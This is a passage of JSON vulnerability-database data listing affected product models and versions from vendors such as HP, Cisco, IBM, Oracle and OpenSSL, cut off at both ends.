"trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "ace30 application control engine module 3.0 a5", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified computing system b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.96" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079150" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.7" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.2.127" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.4.0.2" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "cms r17 r4", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.21" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087220" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "bluemix workflow", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1881" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.00" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1-73" }, { "model": "infosphere balanced warehouse c4000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "infosphere master data management patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "identity service engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.15" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.5.03.00" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "wag310g residential gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0-14" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "infosphere master data management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.4" }, { "model": "cognos controller if1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.1.3" }, { "model": "as infinity", "scope": "ne", "trust": 0.3, "vendor": "pexip", "version": "8.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.2" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "project openssl 1.0.0o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux enterprise server for vmware sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.146" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.6" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.1(0.625)" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7779" }, { "model": "agent desktop", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(2)" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x88079030" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24087370" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2.77" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "jabber voice for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "system management homepage a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.11.197" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.14" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15210" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "network performance analytics", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.64" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "system m4 hd type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054600" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)5.0" }, { "model": "infosphere master data management provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "version control repository manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3.740" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "systems insight manager update", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.31" }, { "model": "system management homepage 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3204.1" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "cms r17 r3", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22279160" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "cognos controller interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.0.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "clustered data ontap", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.6" }, { "model": "infosphere balanced warehouse c3000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "system m4 bd type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054660" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "openssh for gpfs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "iptv", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "linux enterprise desktop sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325025830" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.2.106" }, { "model": "web security appliance 9.0.0 -fcs", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "systems insight manager sp3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "42000" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mint", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "application networking manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage 7.3.2.1", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "3" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.14.20" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.760" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.7" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "84200" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3.0" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.3" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x330073820" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9.790" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.1.730" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x363071580" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "35000" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "initiate master data service patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.5" }, { "model": "bladecenter t advanced management module 32r0835", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.801" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8734-" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.11" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "mobile wireless transport manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "mate design", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "infosphere master data management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24078630" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4.143" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087330" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24089560" }, { "model": "powervu d9190 conditional access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.1" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8730" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3.132" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x353071600" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.0(4.29)" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0" }, { "model": "mate live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0-12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7989" }, { "model": "mobile security suite mss", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.1.104" }, { "model": "cognos controller if3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8740" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "initiate master data service provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1.00" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087180" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8731-" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.146" }, { "model": "idataplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79130" }, { "model": "systems insight manager sp6", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1.73" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "4" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "45000" }, { "model": "telepresence isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "project openssl 1.0.0n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310054570" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "infosphere master data management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3104.1" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1841" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "cognos controller fp1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.2(3.1)" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.4" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.179" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "8" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355079140" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.16" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1886" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087520" }, { "model": "vds service broker", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "systems insight manager", "scope": "eq", 